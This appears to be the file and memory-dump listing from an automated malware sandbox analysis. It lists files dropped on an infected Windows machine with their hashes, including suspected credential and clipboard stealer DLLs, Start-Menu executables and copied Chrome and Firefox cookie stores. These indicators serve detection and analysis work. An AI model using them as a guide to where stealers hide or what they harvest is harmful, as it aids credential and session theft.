fe582246792774c2c9dd15639ffa0aca90d6fd0b

SHA256
fa4ab1d6f79fd677433a31ada7806373a789d34328da46ccb0449bbf347bd73e

SHA512
0a69124819b7568d0dea4e9e85ce8fe61c7ba697c934e3a95e2dcfb9f252b1d9da7faf8774b6e8efd614885507acc94987733eba09a2f5e7098b774dfc8524b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsy4455.tmp\System.dll

Filesize
11KB

MD5
fbe295e5a1acfbd0a6271898f885fe6a

SHA1
d6d205922e61635472efb13c2bb92c9ac6cb96da

SHA256
a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1

SHA512
2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7FF4.tmp.bat

Filesize
143B

MD5
f2657e45adae5f25ede9053653508f85

SHA1
740c060f2caf3212b2c5c9bffffb1cde9430f245

SHA256
53b7ca307de20875e15eedb47d4372eff412bd7c42d542c6b351993cb660bed8

SHA512
c0ab901a6e8bf12fa42f2c4982b9b39b79a499f56dbc46e4a0616ac2f8c982cb8a8f3019046e88ba2c67920868c73c9bdddb2a3e3e70479d781f95b4c4bfce2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA2E9.tmp

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAA7F.tmp

Filesize
92KB

MD5
e93f499f52c3bc7e456a1b5978fc05d5

SHA1
7deaa85ec9fb9401f2010bb0a893635d9a7e02bd

SHA256
8405cf0dbae6930f4add6b7354f71d815919211f8be724292f26e028253e94d2

SHA512
2aa3d1573cc52a1107a9b31fdce074e325130a64e5faa282c7c6b2ca88646013106e39d357710deb90c253e885479ea512d04b2e162a936c58c1e40812af9b31

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

Filesize
89KB

MD5
a5ed103ec4719a27ab3d3c01dac66f01

SHA1
c830d6980d7edea60568a518eccd36c0bc2a4924

SHA256
dbcdc009781edffc3c4e5234d3d23d26364d6bff47e2e384cffdef148d7b5b36

SHA512
b7fbe709a44f0e84a94c9e82f790d04e3d86b5409b5eb2d9f1d4d775b9669694c189042f04001acadb6da4c6284f4fbcbe39fd97427d41619191928510db9d80

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

Filesize
162B

MD5
1b7c22a214949975556626d7217e9a39

SHA1
d01c97e2944166ed23e47e4a62ff471ab8fa031f

SHA256
340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87

SHA512
ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YY.exe

Filesize
512KB

MD5
5a01a667c84893b0ab403b39b3c73b53

SHA1
61e797ce7faf1a6eca4038b29aac0364fb61fba9

SHA256
c296470f0a24955e74c6695312974b6f7b32b89147368e84804b47f76d5befa3

SHA512
6879d03950b1244f4272859fc3db645aabaa2543015808afeec556f5438be6fd9ab562125b421e160aa61c69342bf2a730cdc3715c0bfaf450c20470d10c9336

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YY.exe

Filesize
512KB

MD5
5a01a667c84893b0ab403b39b3c73b53

SHA1
61e797ce7faf1a6eca4038b29aac0364fb61fba9

SHA256
c296470f0a24955e74c6695312974b6f7b32b89147368e84804b47f76d5befa3

SHA512
6879d03950b1244f4272859fc3db645aabaa2543015808afeec556f5438be6fd9ab562125b421e160aa61c69342bf2a730cdc3715c0bfaf450c20470d10c9336

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YY.exe

Filesize
512KB

MD5
5a01a667c84893b0ab403b39b3c73b53

SHA1
61e797ce7faf1a6eca4038b29aac0364fb61fba9

SHA256
c296470f0a24955e74c6695312974b6f7b32b89147368e84804b47f76d5befa3

SHA512
6879d03950b1244f4272859fc3db645aabaa2543015808afeec556f5438be6fd9ab562125b421e160aa61c69342bf2a730cdc3715c0bfaf450c20470d10c9336

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe

Filesize
294KB

MD5
62e48038a1105d8445b0f539b250a2ad

SHA1
f592671e524814bb585b61ecf3c6fea16c724ae8

SHA256
0b34d688a6c36cf55e1c18d22523f62a7fba025cc2035e0c163abd50288ae539

SHA512
3a8874013fa64019b80788d0f32054e59ee56ef8e25188a51026d562212473c6961b7be46eddda11d3babeeb463656ea7c43f48298cde8184a59373ef38a9393

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe

Filesize
280.2MB

MD5
9126d9a3806643f54aefa7c8d8da9a20

SHA1
053cd5ae7f47317218123e92cf3d6dd09aab9981

SHA256
4de394b35c1b32d07a7d188b827e90a657f61b5dfd1e9c0e6b2a6df3a77c31c2

SHA512
9b2684d7252ef8411260527f5e761cce30808bb8019961f556af2aebf21cae63d60258fee1af1e6a08028614ef3a80795e3b439f844afbd10564bf5805aa8c41

Download Submit
C:\Users\Admin\AppData\Roaming\jhcgcda

Filesize
274KB

MD5
1f95b8c2dc09a84f6a9fe6f74dbf7d96

SHA1
35f2c55596e43c2887d70a172d452fc5ac36835d

SHA256
9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330

SHA512
7d7bf42a7df0ec4dcf0f8ac891bee60871ddc45c9887d8b5022dcddc27fae7afdd2134370f1a5ac898c364c5d702e9fb84b496d7c8a253fefd96d65715ba563c

Download Submit
C:\Users\Admin\AppData\Roaming\ookttpyiie\nnwsscxxh.exe

Filesize
321KB

MD5
8a1e832674033cb7fdd73a8cf55971fd

SHA1
0923b3c19a178a797e7dcf784c9060338d0dedef

SHA256
bb992023216a9723d9157cacbe3f2dec846902eacce0122734d6111c85ee6309

SHA512
1b612e6e7c366febc38bff714ac3b7bd4ac8daaf74f81a21288693d0da455d2b3f9f7f56188156995c2b5cdab319987d98e5dbafe8877365e6b4469406c5c87c

Download Submit
C:\Users\Admin\AppData\Roaming\s1khzo0g.ewd\Chrome\Default\Network\Cookies

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Roaming\s1khzo0g.ewd\Firefox\Profiles\p4wuoroe.default-release\cookies.sqlite

Filesize
96KB

MD5
d367ddfda80fdcf578726bc3b0bc3e3c

SHA1
23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

SHA256
0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

SHA512
40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

Download Submit
C:\Users\Admin\Videos\Captures\desktop.ini

Filesize
190B

MD5
b0d27eaec71f1cd73b015f5ceeb15f9d

SHA1
62264f8b5c2f5034a1e4143df6e8c787165fbc2f

SHA256
86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

SHA512
7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

Download Submit
C:\Users\Public\WindowsApp1.exe

Filesize
112KB

MD5
23d5e4451d06e75a3096a65250bad00b

SHA1
aed599efd69fdb9985c0e60558514e6c451fe329

SHA256
a3551ac295e91fd27d9e8bdb341452bc2aca9a6f9235bd3c4de7e2acf8ea775e

SHA512
d4a41e7a3c2e62ab84af308092dd8a86121908bb87cf510b2b1d91e70726d80666eb26b9407c20c48260999be1c647cdb2bcf8abe9a204e6f1fa762c75bf669d

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
\Users\Admin\AppData\Local\Temp\nsa9297.tmp\System.dll

Filesize
11KB

MD5
fbe295e5a1acfbd0a6271898f885fe6a

SHA1
d6d205922e61635472efb13c2bb92c9ac6cb96da

SHA256
a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1

SHA512
2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

Download Submit
\Users\Admin\AppData\Local\Temp\nse755B.tmp\System.dll

Filesize
11KB

MD5
0063d48afe5a0cdc02833145667b6641

SHA1
e7eb614805d183ecb1127c62decb1a6be1b4f7a8

SHA256
ac9dfe3b35ea4b8932536ed7406c29a432976b685cc5322f94ef93df920fede7

SHA512
71cbbcaeb345e09306e368717ea0503fe8df485be2e95200febc61bcd8ba74fb4211cd263c232f148c0123f6c6f2e3fd4ea20bdecc4070f5208c35c6920240f0

Download Submit
memory/220-390-0x00000000066C0000-0x0000000006710000-memory.dmp

Filesize
320KB

Download
memory/220-378-0x0000000005720000-0x0000000005730000-memory.dmp

Filesize
64KB

Download
memory/220-370-0x0000000000E40000-0x0000000000E70000-memory.dmp

Filesize
192KB

Download
memory/220-371-0x00000000056F0000-0x00000000056F6000-memory.dmp

Filesize
24KB

Download
memory/220-372-0x0000000005D40000-0x0000000006346000-memory.dmp

Filesize
6.0MB

Download
memory/220-373-0x0000000005840000-0x000000000594A000-memory.dmp

Filesize
1.0MB

Download
memory/220-375-0x0000000005750000-0x0000000005762000-memory.dmp

Filesize
72KB

Download
memory/220-376-0x00000000057B0000-0x00000000057EE000-memory.dmp

Filesize
248KB

Download
memory/220-377-0x00000000057F0000-0x000000000583B000-memory.dmp

Filesize
300KB

Download
memory/220-392-0x0000000008FE0000-0x000000000950C000-memory.dmp

Filesize
5.2MB

Download
memory/220-382-0x0000000005AD0000-0x0000000005B46000-memory.dmp

Filesize
472KB

Download
memory/220-383-0x0000000005BF0000-0x0000000005C82000-memory.dmp

Filesize
584KB

Download
memory/220-391-0x0000000007260000-0x0000000007422000-memory.dmp

Filesize
1.8MB

Download
memory/220-384-0x0000000006D60000-0x000000000725E000-memory.dmp

Filesize
5.0MB

Download
memory/220-385-0x0000000005C90000-0x0000000005CF6000-memory.dmp

Filesize
408KB

Download
memory/220-389-0x0000000005720000-0x0000000005730000-memory.dmp

Filesize
64KB

Download
memory/228-186-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/348-220-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-676-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-421-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-184-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-988-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-222-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-679-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-256-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-199-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-190-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-187-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-311-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-318-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-182-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-328-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-981-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/348-419-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/2188-140-0x0000000000D10000-0x0000000000E9E000-memory.dmp

Filesize
1.6MB

Download
memory/2188-203-0x0000000003000000-0x0000000003010000-memory.dmp

Filesize
64KB

Download
memory/2188-205-0x00000000014A0000-0x00000000014A1000-memory.dmp

Filesize
4KB

Download
memory/2188-332-0x0000000003000000-0x0000000003010000-memory.dmp

Filesize
64KB

Download
memory/2652-121-0x0000000000910000-0x0000000000918000-memory.dmp

Filesize
32KB

Download
memory/2652-246-0x000000001B620000-0x000000001B630000-memory.dmp

Filesize
64KB

Download
memory/2652-122-0x000000001B620000-0x000000001B630000-memory.dmp

Filesize
64KB

Download
memory/3204-418-0x000000000E450000-0x000000000E49B000-memory.dmp

Filesize
300KB

Download
memory/3204-407-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/3204-417-0x0000000008D80000-0x0000000008D90000-memory.dmp

Filesize
64KB

Download
memory/3204-416-0x0000000006700000-0x0000000006706000-memory.dmp

Filesize
24KB

Download
memory/3204-456-0x0000000008D80000-0x0000000008D90000-memory.dmp

Filesize
64KB

Download
memory/3312-263-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/3312-262-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/3312-261-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/3316-254-0x00000272EC230000-0x00000272EC240000-memory.dmp

Filesize
64KB

Download
memory/3316-272-0x00000272EC6B0000-0x00000272EC726000-memory.dmp

Filesize
472KB

Download
memory/3316-259-0x00000272EC000000-0x00000272EC022000-memory.dmp

Filesize
136KB

Download
memory/3316-360-0x00000272EC230000-0x00000272EC240000-memory.dmp

Filesize
64KB

Download
memory/3316-388-0x00000272EC230000-0x00000272EC240000-memory.dmp

Filesize
64KB

Download
memory/3316-253-0x00000272EC230000-0x00000272EC240000-memory.dmp

Filesize
64KB

Download
memory/3316-374-0x00000272EC230000-0x00000272EC240000-memory.dmp

Filesize
64KB

Download
memory/3316-300-0x00000272EC230000-0x00000272EC240000-memory.dmp

Filesize
64KB

Download
memory/3316-357-0x00000272EC230000-0x00000272EC240000-memory.dmp

Filesize
64KB

Download
memory/3316-380-0x00000272EC230000-0x00000272EC240000-memory.dmp

Filesize
64KB

Download
memory/3368-251-0x000001FCCC4E0000-0x000001FCCC4F0000-memory.dmp

Filesize
64KB

Download
memory/3368-248-0x000001FCCC4E0000-0x000001FCCC4F0000-memory.dmp

Filesize
64KB

Download
memory/3368-358-0x000001FCCC4E0000-0x000001FCCC4F0000-memory.dmp

Filesize
64KB

Download
memory/3368-381-0x000001FCCC4E0000-0x000001FCCC4F0000-memory.dmp

Filesize
64KB

Download
memory/3368-359-0x000001FCCC4E0000-0x000001FCCC4F0000-memory.dmp

Filesize
64KB

Download
memory/3368-387-0x000001FCCC4E0000-0x000001FCCC4F0000-memory.dmp

Filesize
64KB

Download
memory/3368-302-0x000001FCCC4E0000-0x000001FCCC4F0000-memory.dmp

Filesize
64KB

Download
memory/3368-368-0x000001FCCC4E0000-0x000001FCCC4F0000-memory.dmp

Filesize
64KB

Download
memory/3376-241-0x0000000000A60000-0x0000000000DCC000-memory.dmp

Filesize
3.4MB

Download
memory/3376-363-0x000000001BAB0000-0x000000001BAC0000-memory.dmp

Filesize
64KB

Download
memory/3376-386-0x000000001BAB0000-0x000000001BAC0000-memory.dmp

Filesize
64KB

Download
memory/3376-379-0x000000001BAC0000-0x000000001BE08000-memory.dmp

Filesize
3.3MB

Download
memory/3696-257-0x0000012A5F480000-0x0000012A5F490000-memory.dmp

Filesize
64KB

Download
memory/3732-147-0x0000000000700000-0x000000000070A000-memory.dmp

Filesize
40KB

Download
memory/3732-152-0x0000000004F90000-0x0000000004FA0000-memory.dmp

Filesize
64KB

Download
memory/3968-179-0x0000017F1EF80000-0x0000017F1EFF4000-memory.dmp

Filesize
464KB

Download
memory/3968-181-0x0000017F1D660000-0x0000017F1D66C000-memory.dmp

Filesize
48KB

Download
memory/3968-183-0x0000017F37870000-0x0000017F37880000-memory.dmp

Filesize
64KB

Download
memory/3968-153-0x0000017F1D2A0000-0x0000017F1D324000-memory.dmp

Filesize
528KB

Download
memory/4248-916-0x000001F02A8C0000-0x000001F02A8C1000-memory.dmp

Filesize
4KB

Download
memory/4304-851-0x000000001B6F0000-0x000000001B700000-memory.dmp

Filesize
64KB

Download
memory/4304-859-0x0000000001120000-0x0000000001121000-memory.dmp

Filesize
4KB

Download
memory/4820-972-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4820-930-0x0000000001A40000-0x0000000001A41000-memory.dmp

Filesize
4KB

Download
memory/4820-928-0x0000000001A30000-0x0000000001A31000-memory.dmp

Filesize
4KB

Download
memory/4820-968-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4820-976-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4820-989-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4820-937-0x0000000001A60000-0x0000000001A61000-memory.dmp

Filesize
4KB

Download
memory/4820-927-0x00000000018F0000-0x00000000018F1000-memory.dmp

Filesize
4KB

Download
memory/4820-939-0x0000000000400000-0x000000000189D000-memory.dmp

Filesize
20.6MB

Download
memory/4820-994-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/4820-932-0x0000000001A50000-0x0000000001A51000-memory.dmp

Filesize
4KB

Download
memory/4820-922-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/4820-925-0x00000000018E0000-0x00000000018E1000-memory.dmp

Filesize
4KB

Download
memory/4824-979-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/4824-970-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/4952-846-0x0000000000FA0000-0x0000000000FD0000-memory.dmp

Filesize
192KB

Download
memory/4952-854-0x0000000003200000-0x0000000003206000-memory.dmp

Filesize
24KB

Download
memory/4952-886-0x00000000058A0000-0x00000000058B0000-memory.dmp

Filesize
64KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads